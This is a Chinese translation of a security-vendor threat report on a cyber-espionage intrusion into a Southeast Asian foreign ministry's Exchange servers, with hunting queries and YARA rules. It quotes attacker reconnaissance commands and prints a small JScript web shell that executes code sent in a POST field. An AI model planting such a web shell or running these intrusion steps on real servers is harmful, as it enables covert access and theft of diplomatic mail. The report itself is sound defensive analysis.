SiestaGraph：在东盟成员国外交部发现的新植入程序

主要发现

• 可能存在多个威胁行动者，他们正在利用可能存在漏洞且连接到互联网的 Microsoft Exchange 服务器，访问东盟成员国外交部的网络并对其进行实时操作。在获得并保护访问权限后，目标个人的邮箱被导出。
• 威胁行动者部署了一个自定义恶意软件后门，该后门利用 Microsoft Graph API 进行命令和控制，我们将其命名为 SiestaGraph。
• 一个名为 DoorMe 的 IIS 后门的修改版本被利用，该版本具有分配 shellcode 和加载其他植入程序的新功能。

前言

12 月初，Elastic Security Labs 观察到 Powershell 命令被用来从东南亚国家联盟 (ASEAN) 成员外交部的连接到互联网的 Microsoft Exchange 服务器收集和导出邮箱。

尽管在此活动期间观察到各种安全工具，威胁行动者还是能够实现以下目标

• 在 Exchange 服务器、域控制器和工作站上执行恶意软件
• 泄露目标用户和组邮箱
• 部署 Web Shell
• 横向移动到用户工作站
• 执行内部侦察
• 收集 Windows 凭据

由于入侵正在进行中，并且几乎涵盖了整个 MITRE ATT&CK 框架，因此分析部分将采用时间线方法。

有关 SIESTAGRAPH、DOORME 或 SHADOWPAD 恶意软件系列的深入分析，请查看我们的后续出版物，其中详细介绍了这些内容。此外，根据其他观察结果和第三方报告，本次活动与其他活动之间存在关联。

更新时间：2023 年 2 月 2 日

分析

我们正在追踪的调查活动 REF2924，始于执行用于导出用户邮箱的 Powershell 命令。虽然这是一个正常的管理功能，但这些命令的执行过程溯源于 IIS 工作进程 (w3wp.exe) 作为 cmd.exe 的父进程，然后 cmd.exe 执行 Powershell。

这些事件启动了调查，随后在有争议的网络环境中识别出多个威胁行动者。

从这个活动集群中观察到的第一个事件发生在 2022 年 11 月 26 日，当时在域控制器上检测到一个恶意文件执行。因此，Elastic Defend 很可能是在初始入侵后部署的，并且以“检测”模式部署。在我们的分析中，我们观察到环境中存在其他安全工具，这表明受害者意识到了入侵并试图驱逐威胁行动者。

由于多个恶意软件样本实现了类似的目标、观察到各种 DLL 侧加载以及存在可能连接到互联网的 Exchange 服务器；我们认为存在多个威胁行动者或威胁组织独立或协同工作。

2022 年 11 月 26 日至 30 日

恶意软件执行

已知最早的入侵证据发生在 2022 年 11 月 26 日，当时在域控制器上从 **C:\ProgramData\Microsoft** 执行了一个名为 OfficeClient.exe 的文件。

在域控制器上执行 OfficeClient.exe 10 分钟后，在另一台 Windows 2019 服务器上执行了另一个恶意文件。该文件名为 Officeclient.exe，从 **c:\windows\pla** 执行。2022 年 11 月 28 日，在同一台 Windows 2019 服务器上从 **C:\programdata** 执行了 officeup.exe。

2022 年 11 月 29 日，OfficeClient.exe 文件以 C:\ProgramData\OfficeCore.exe 的形式在 Exchange 服务器上执行。

所有这三个文件（OfficeClient.exe、Officeclient.exe 和 OfficeCore.exe）的原始 PE 文件名均为 windowss.exe，这是在编译时分配的文件名。我们将此恶意软件家族命名为“SiestaGraph”，因为它具有较长的睡眠定时器以及恶意软件使用 Microsoft Graph API 进行命令和控制的方式。

截至 2022 年 12 月 8 日，我们在 VirusTotal 中观察到 SiestaGraph 的一个变体，该变体于 2022 年 10 月 14 日从荷兰上传。SiestaGraph 使用一个 .NET API 库，该库的功能与使用 Microsoft Graph 的功能相同，Microsoft Graph 是一个与 Microsoft 云（包括 Microsoft 365、Windows 和企业移动性 + 安全性）交互的 API。

内部侦察

2022 年 11 月 28 日，威胁行动者开始执行内部侦察，方法是发出标准命令，如 whoami、hostname、tasklist 等。这些命令的执行过程溯源于 IIS 工作进程 (w3wp.exe) 作为 cmd.exe 的父进程，然后 cmd.exe 执行这些命令。

cmd.exe /c cd /d C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\resources"&whoami

cmd.exe /c cd /d C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\resources"&hostname

cmd.exe /c cd /d C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\resources"&tasklist

执行了额外的对手侦察，以枚举本地网络资产以及驻外使领馆中的受害者资产。目前尚无迹象表明此信息随后被用于其他访问或信息。

2022 年 11 月 29 日，威胁行动者开始使用 net user 和 net group 命令收集域用户和组信息，这些命令同样作为 w3wp.exe 和 cmd.exe 的子进程发出。这些命令证实，这并非完全是脚本化的活动，并且包含一个活跃的操作员，因为他们忘记在 20 个 net user 命令中的两个命令中添加 /domain 语法。虽然 net user 命令不需要 /domain 语法，但只有 20 个命令中的两个命令出现这种情况，这很可能是操作员的疏忽。这是在本次活动中观察到的多个拼写错误中的第一个。

导出 Exchange 邮箱

2022 年 11 月 28 日，威胁行为者再次开始导出用户邮箱，仍然使用 w3wp.exe 进程作为 cmd.exe 的父进程，最终使用 Powershell。威胁行为者添加了 Microsoft.Exchange.Management.PowerShell.SnapIn 模块。此模块提供了使用 Powershell 管理 Exchange 功能的能力，并被用来导出目标外事官员的邮箱，并将其保存为 PST 文件。

在上面的示例中，Received -gt 和 Sent -gt 日期将收集窗口限定在 2022 年 11 月 15 日之后（gt 是 “大于” 的缩写）发送和接收的所有电子邮件。时间限定并非在所有邮箱中都是统一的，并且此过程重复多次。同样，在上面 2022 年 11 月 28 日的示例中，时间限定为 2022 年 11 月 15 日至当前日期（2022 年 11 月 28 日）发送和接收的所有电子邮件；在 2022 年 12 月 6 日，再次导出邮箱，这次的 gt 值为 2022 年 11 月 28 日，即上次导出的日期。

在此阶段的另一个示例中，威胁行为者以名为 csirt 的邮箱为目标。虽然这一点未经证实，但 “csirt” 通常是网络安全事件响应团队的缩写。

考虑到在 csirt 导出上使用的时间限定，如果这是 CSIRT 的行业标准缩写，则入侵可能早在 2022 年 9 月 1 日就已开始，并且威胁行为者正在监控 CSIRT 以确定他们的入侵是否已被检测到。

在此阶段，总共导出了 24 个邮箱。

导出邮箱后，威胁行为者创建了一个名为 7.tmp 的 7zip 存档，密码为 huebfkaudfbaksidfabsdf。

其中三个邮箱，其中一个是 csirt 邮箱，被单独存档。这三个邮箱以 .log.rar 或 .log 文件扩展名进行存档。

最后，威胁行为者创建了一个 200m 的 7zip 存档，名为 o.7z，并将之前创建的受密码保护的 7.tmp 存档添加到其中。

IIS 后门模块

2022 年 11 月 28 日，我们观察到通过执行使用 svchost.exe 的 iissvcs 服务加载了两个 DLL 文件，即 Microsoft.Exchange.Entities.Content.dll 和 iisrehv.dll。Microsoft.Exchange.Entities.Content.dll 和 iisrehv.dll 都是通过执行 C:\Windows\system32\svchost.exe -k iissvcs 的 Windows 服务主机的 iissvcs 模块加载的。这些恶意 IIS 模块松散地基于 DoorMe IIS 后门。

为了便于理解，IIS 是微软开发的 Web 服务器软件，在 Windows 生态系统中使用，用于托管网站和服务器端应用程序。从 7.0 版本开始，微软扩展了 IIS，添加了一个模块化架构，允许添加或删除各个模块，以根据环境的需求实现功能。这些模块代表服务器可以用来处理传入请求的各个功能。

在入侵后的阶段，攻击者使用恶意 IIS 模块作为被动后门，监控所有传入的 HTTP 请求。根据操作员的定制请求，恶意软件将激活并处理命令。这种方法对组织来说可能具有挑战性，因为通常在监控方面可见性较低，并且在这些类型的端点上缺乏预防能力。为了安装此后门，需要管理员权限，并且该模块必须放置在 %windir%\System32\inetsrv 目录中，根据观察到的工件，我们认为初始访问是通过最近一波 Microsoft Exchange RCE 漏洞利用而获得的服务器漏洞利用实现的。

恶意模块 (C++ DLL) 首先通过其导出 RegisterModule 加载。此函数负责设置事件处理程序方法，并动态解析 API 库以供将来使用。后门的主要功能是使用 CGlobalModule 类在事件处理程序 OnGlobalPreBeginRequest 下实现的。通过覆盖此事件处理程序，恶意软件将在请求进入管道之前加载。后门的核心功能都存在于此函数中，包括 Cookie 验证、解析命令和调用底层命令函数。

恶意软件实现了一种基于包含身份验证密钥的特定 Cookie 名称的身份验证机制。此恶意 IIS 模块检查每个传入的 HTTP 请求中是否包含指定的 Cookie 名称，如果是 GET 请求，则返回成功消息。GET 请求用作测试操作员后门状态的一种方式，并且它还会返回受影响机器的用户名和主机名。可以通过 POST 请求以数据的形式将命令传递给后门。

在我们的分析过程中，我们发现了 VirusTotal 上与此后门相关的旧样本。尽管它们具有相同的身份验证和逻辑，但它们实现的功能不同。用于身份验证的 Cookie 名称也随着处理的命令而更改。

观察到的后门实现了四个不同的命令，符号 PIPE 用于分隔命令 ID 及其参数。

从我们的分析来看，这个简单的后门似乎被用作阶段加载器。它使用 NT Windows API，主要是 NtAllocateVirtualMemory、NtProtectVirtualMemory 和 NtCreateThreadEx 来分配所需的 shellcode 内存并创建执行线程。

kk2.exe

2022 年 11 月 30 日，一个名为 kk2.exe 的未知二进制文件在 Exchange 服务器上执行。虽然在撰写本文时我们未能收集到 kk2.exe，但我们可以看到它被用来加载一个易受攻击的驱动程序，该驱动程序可用于从内核模式监控和终止进程，即 mhyprot.sys。目前尚不清楚 mhyprot.sys 是下载的还是嵌入到 kk2.exe 中的。

mhyprot.sys 是由 Elastic 的开放代码 Windows.VulnDriver.Mhyprot YARA 规则检测到的，该规则于 2022 年 8 月发布。

有关如何使用易受攻击的驱动程序进行入侵的更多信息，请查看 Joe Desimone 于 2022 年 9 月发布的阻止易受攻击的驱动程序攻击研究。

如前所述，我们无法收集 kk2.exe 进行分析，但它很可能使用 mhyprot.sys 升级到内核模式，以此来监控并在必要时终止进程。这可以用来保护植入程序或整个入侵免受检测。

Web Shell

以下部分重点介绍了威胁行为者为防止被驱逐而多次尝试将 Web Shell 作为后门安装到环境中。虽然本质上是推测性的，但似乎加载 Web Shell 的大多数尝试都失败了。目前尚不清楚失败的原因是什么。我们不会介绍加载 Web Shell 的所有尝试，因为其中一些尝试非常相似，但我们将重点介绍方法的转变。

第一次尝试是使用 Microsoft certutil 工具从远程主机 (185.239.70[.]229) 下载 Active Server Pages (ASPX) 文件 (config.aspx)，并将其保存为 Exchange 控制面板 Web 服务器上的 error.aspx 页面。因为这个 IP 地址是 已知的 Cobalt Strike 服务器，它可能已被网络防御架构阻止，从而导致进一步尝试覆盖 error.aspx。

在尝试从 Cobalt Strike C2 服务器使用 config.aspx 后，威胁行为者试图将 Base64 编码的 Javascript 插入到文本文件 (1.txt) 中，使用 certutil 解码 Base64 编码的 Javascript (2.aspx)，然后用 2.aspx 覆盖 error.aspx。这在 Exchange 控制面板和 Outlook Web Access Web 服务器上都进行了尝试。

Base64 编码的字符串解码为以下 Javascript

<%@ Page Language="Jscript" Debug=true%>
<%
var TNKY='nHsXLMPUSCABolxOgKWuIFeGVimhEjyzQrTvRcwafZdJDktqYpbN';
var ZZXG=Request.Form("daad");
var VAXN=TNKY(7) + TNKY(0) + TNKY(2) + TNKY(10) + TNKY(21) + TNKY(22);
eval(ZZXG, VAXN);
%

上面的代码是一个简单的 Web Shell，利用 eval 方法来评估通过 POST 参数 daad 发送的 JScript 代码。多次尝试了这种技术的变体。还观察到其他尝试加载 混淆版本的 中国菜刀 和 Godzilla Web Shell。

2022 年 12 月 1 日至 4 日

DLL 侧加载

2022 年 12 月 2 日，在两个域控制器上，我们观察到新的 DLL (log.dll) 被一个合法的，但已有 11 年历史的 Bitdefender 崩溃处理程序可执行文件（编译名称：BDReinit.exe），13802 AR.exe 侧加载。执行后，它将移动到 **C:\ProgramData\OfficeDriver** 目录，将自身重命名为 **svchost.exe**，并将自身安装为服务。

加载 log.dll 后，它将生成 Microsoft Windows Media Player (wmplayer.exe) 和 dllhost.exe 并注入它们，这将触发内存 shellcode 检测。

2023 年 2 月 2 日更新：在我们的对 SIESTAGRAPH、DOORME 和 SHADOWPAD 的更新研究中，我们将_ log.dll _识别为 SHADOWPAD 恶意软件家族的一部分。

2022 年 12 月 2 日，另一个未知的 DLL，Loader.any，由一个管理帐户使用 rundll32.exe 以交互方式执行。观察到 Loader.any 在域控制器上执行了两次，然后被交互删除。

2022 年 12 月 3 日，我们观察到另一个恶意文件 APerfectDayBase.dll。虽然这是一个已知的恶意文件，但没有观察到执行。APerfectDayBase.dll 是一个良性程序 AlarmClock.exe 的导入表中 DLL 的合法名称。

此命名似乎是为了使恶意 DLL 看起来合法，并且很可能利用 AlarmClock.exe 作为侧加载目标。测试已证实该 DLL 可以使用 AlarmClock.exe 进行侧加载。虽然不是恶意文件，但我们将 AlarmClock.exe 的哈希值包含在指标表中，因为它的存在可能仅被用作恶意 DLL APerfectDayBase.dll 的侧加载工具。

受害者学和目标动机

钻石模型

Elastic Security 利用钻石模型来描述攻击者、能力、基础设施和入侵受害者之间的高级关系。虽然钻石模型最常用于单次入侵，并利用活动线程（第 8 节）作为在事件之间创建关系的一种方式，但以攻击者为中心（第 7.1.4 节）的方法允许创建（虽然杂乱）的单个钻石。

受害者学

受害者是东南亚一个国家的外交部。威胁行为者似乎将情报收集工作的重点放在与受害者和东盟（东南亚国家联盟）关系相关的人员和权力职位上。

东盟（ASEAN）是一个区域性合作联盟，成立于1967年，旨在促进成员国之间的政府间合作。这种合作体现在经济、安全、贸易和教育领域，对伙伴国家具有日益重要的国际和国内意义。该联盟本身已扩大到10个成员国，另有2个国家正在寻求加入。它正通过与更广泛的成员国（16个成员国和2个申请国）达成的区域全面经济伙伴关系协定（RCEP）来发挥其国际影响力。

以下是目标用户列表、其邮箱被导出的收集窗口以及邮箱导出日期。

如上所示，我们观察到用户 1、5 和 7 各被定位了两次，这表明其邮箱内容特别受关注。这可能是入侵前侦察的结果，或者是在威胁行为者审查了最初的一批邮箱后，他们决定继续收集这些用户的信息。

目标动机

没有迹象表明此受害者会给对手提供任何直接的经济利益。这次攻击似乎是为了进行外交情报收集。许多潜在的对手会发现一个国家与东盟相关的机密外交通信，以及更广泛的RCEP，对于进一步扩大其在该地区的势力、国家安全和国内目标非常有利。

如果威胁行为者被排除在东盟贸易联盟之外，并且依赖于这些贸易联盟成员的外国援助，那么他们可能会发现与东盟相关的机密外交信息对于谈判或重新谈判贸易协定很有用。

东盟成员国在南海（SCS）的领土争端中是竞争的声索国。东盟作为一个组织，在南海争端中没有形成统一战线，一些成员国倾向于直接进行国家间谈判，而另一些成员国则希望东盟作为一个整体进行谈判。来自东盟成员国的外交信息可能会为威胁行为者提供有用的信息，以影响围绕南海的决策和谈判。威胁行为者对东盟和任何个别成员国的兴趣几乎肯定是多方面的，涵盖从移民到农业、技术，再到诸如人权等社会政治方面的政府职能。

检测逻辑

预防规则

• 潜在的伪装成SVCHOST
• 通过不受信任的路径进行二进制伪装
• 从不寻常的目录执行进程

检测规则

• 潜在的通过DCSync进行凭据访问
• 通过不寻常的客户端安装Windows服务
• 可疑的Microsoft IIS工作进程后代
• 使用WinRar或7z加密文件
• 通过PowerShell导出Exchange邮箱
• Windows网络枚举
• 复制NTDS或SAM数据库文件
• 可疑的CertUtil命令

狩猎查询

KQL和EQL的事件都使用Elastic Defend集成通过Elastic Agent提供。狩猎查询可能会返回高信号或误报。这些查询用于识别潜在的可疑行为，但需要进行调查以验证结果。

KQL查询

使用Kibana中的Discover应用程序，以下查询将识别已被Elastic Defend识别为恶意的已加载IIS模块（即使Elastic Defend处于“仅检测”模式）。

前导和尾随通配符（*）在大事件量的情况下可能会导致昂贵的搜索。

event.code : “malicious_file” and event.action : "load" and process.name : “w3wp.exe” and process.command_line.wildcard : (*MSExchange* or *SharePoint*)

EQL查询

在Kibana安全解决方案的“时间线”部分的“关联”选项卡下，您可以使用以下EQL查询来搜索与SiestaGraph后门和观察到的DLL侧加载模式类似的行为。

# Hunt for DLL Sideloading using the observed DLLs:

library where
 dll.code_signature.exists == false and
 process.code_signature.trusted == true and
 dll.name : ("log.dll", "APerfectDayBase.dll") and
 process.executable :
           ("?:\\Windows\\Tasks\\*",
            "?:\\Users\\*",
            "?:\\ProgramData\\*")

# Hunt for scheduled task or service from a suspicious path:

process where event.type == "start" and
 process.executable : ("?:\\Windows\\Tasks\\*", "?:\\Users\\Public\\*", "?:\\ProgramData\\Microsoft\\*") and
 (process.parent.args : "Schedule" or process.parent.name : "services.exe")

# Hunt for the SiestaGraph compiled file name and running as a scheduled task:

process where event.type == "start" and
 process.pe.original_file_name : "windowss.exe" and not process.name : "windowss.exe" and process.parent.args : "Schedule"

# Hunt for unsigned executable using Microsoft Graph API:

network where event.action == "lookup_result" and
 dns.question.name : "graph.microsoft.com" and process.code_signature.exists == false

YARA

Elastic Security创建了YARA规则来识别此活动。以下是YARA规则，用于识别SiestaGraph恶意软件植入和DoorMe IIS后门。

rule Windows_Trojan_DoorMe {
    meta:
        author = "Elastic Security"
        creation_date = "2022-12-09"
        last_modified = "2022-12-15"
        os = "Windows"
        arch = "x86"
        category_type = "Trojan"
        family = "DoorMe"
        threat_name = "Windows.Trojan.DoorMe"
        reference_sample = "96b226e1dcfb8ea2155c2fa508125472c8c767569d009a881ab4c39453e4fe7f"
    strings:
        $seq_aes_crypto = { 8B 6C 24 ?? C1 E5 ?? 8B 5C 24 ?? 8D 34 9D ?? ?? ?? ?? 0F B6 04 31 32 44 24 ?? 88 04 29 8D 04 9D ?? ?? ?? ?? 0F B6 04 01 32 44 24 ?? 88 44 29 ?? 8D 04 9D ?? ?? ?? ?? 0F B6 04 01 44 30 F8 88 44 29 ?? 8D 04 9D ?? ?? ?? ?? 0F B6 04 01 44 30 E0 88 44 29 ?? 8B 74 24 ?? }
        $seq_copy_str = { 48 8B 44 24 ?? 48 89 58 ?? 48 89 F1 4C 89 F2 49 89 D8 E8 ?? ?? ?? ?? C6 04 1E ?? }
        $seq_md5 = { 89 F8 44 21 C8 44 89 C9 F7 D1 21 F1 44 01 C0 01 C8 44 8B AC 24 ?? ?? ?? ?? 8B 9C 24 ?? ?? ?? ?? 48 89 B4 24 ?? ?? ?? ?? 44 89 44 24 ?? 46 8D 04 28 41 81 C0 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 41 C1 C0 ?? 45 01 C8 44 89 C1 44 21 C9 44 89 C2 F7 D2 21 FA 48 89 BC 24 ?? ?? ?? ?? 8D 2C 1E 49 89 DC 01 D5 01 E9 81 C1 ?? ?? ?? ?? C1 C1 ?? 44 01 C1 89 CA 44 21 C2 89 CD F7 D5 44 21 CD 8B 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 8D 1C 07 01 EB 01 DA 81 C2 ?? ?? ?? ?? C1 C2 ?? }
        $seq_calc_key = { 31 FF 48 8D 1D ?? ?? ?? ?? 48 83 FF ?? 4C 89 F8 77 ?? 41 0F B6 34 3E 48 89 F1 48 C1 E9 ?? 44 0F B6 04 19 BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 83 E6 ?? 44 0F B6 04 1E BA ?? ?? ?? ?? 48 8B 4D ?? E8 ?? ?? ?? ?? 48 83 C7 ?? }
        $seq_base64 = { 8A 45 ?? 8A 4D ?? C0 E0 ?? 89 CA C0 EA ?? 80 E2 ?? 08 C2 88 55 ?? C0 E1 ?? 8A 45 ?? C0 E8 ?? 24 ?? 08 C8 88 45 ?? 41 83 C4 ?? 31 F6 44 39 E6 7D ?? 66 90 }
        $str_0 = ".?AVDoorme@@" ascii fullword
    condition:
        3 of ($seq*) or 1 of ($str*)
}

rule Windows_Trojan_SiestaGraph {
    meta:
        author = "Elastic Security"
        creation_date = "2022-12-14"
        last_modified = "2022-12-15"
        os = "Windows"
        arch = "x86"
        category_type = "Trojan"
        family = "SiestaGraph"
        threat_name = "Windows.Trojan.SiestaGraph"
        reference_sample = "50c2f1bb99d742d8ae0ad7c049362b0e62d2d219b610dcf25ba50c303ccfef54"
    strings:
        $a1 = "downloadAsync" ascii nocase fullword
        $a2 = "UploadxAsync" ascii nocase fullword
        $a3 = "GetAllDriveRootChildren" ascii fullword
        $a4 = "GetDriveRoot" ascii fullword
        $a5 = "sendsession" wide fullword
        $b1 = "ListDrives" wide fullword
        $b2 = "Del OK" wide fullword
        $b3 = "createEmailDraft" ascii fullword
        $b4 = "delMail" ascii fullword
    condition:
        all of ($a*) and 2 of ($b*)
}

观察到的对手战术和技术

Elastic使用MITRE ATT&CK框架来记录高级持续性威胁针对企业网络使用的常见战术、技术和程序。

战术

战术代表技术或子技术的原因。它是对手的战术目标：执行行动的原因。

• 侦察
• 初始访问
• 执行
• 持久性
• 防御规避
• 凭据访问
• 发现
• 横向移动
• 收集
• 命令和控制

技术/子技术

技术和子技术代表对手如何通过执行行动来实现战术目标。

• 收集主机信息
• 收集受害者信息
• 收集受害者网络信息
• 收集受害者组织信息
• 利用面向公众的应用程序
• 命令和脚本解释器：Windows命令外壳
• 命令和脚本解释器：Powershell
• 网络共享发现
• 远程系统发现
• 文件和目录发现
• 进程发现
• 远程服务：SMB/Windows管理共享
• 系统服务发现
• 系统所有者/用户发现
• 劫持执行流程：DLL侧加载
• 伪装：伪装任务或服务
• 进程注入
• 指示器移除：文件删除
• 反混淆/解码文件或信息
• 虚拟化/沙盒规避：基于时间的规避
• 操作系统凭据转储：NTDS
• 操作系统凭据转储：安全帐户管理器
• 操作系统凭据转储：DCSync
• 创建或修改系统进程：Windows服务
• 计划任务/作业：计划任务
• 有效帐户
• 服务器软件组件：IIS组件
• 服务器软件组件：Web shell
• 电子邮件收集：本地电子邮件收集
• 存档收集的数据：通过实用程序存档
• 屏幕截图
• Web服务
• 应用程序层协议：Web协议

参考

• https://malpedia.caad.fkie.fraunhofer.de/details/win.doorme
• https://elastic.ac.cn/security-labs/stopping-vulnerable-driver-attacks
• https://threatfox.abuse.ch/ioc/1023850/
• https://malpedia.caad.fkie.fraunhofer.de/details/win.chinachopper
• https://malpedia.caad.fkie.fraunhofer.de/details/jsp.godzilla_webshell
• https://github.com/tennc/webshell/blob/master/Godzilla/123.ashx

可观察对象

所有可观察对象也可在此处下载，以ECS和STIX格式的组合zip包提供。

本研究中讨论了以下可观察对象。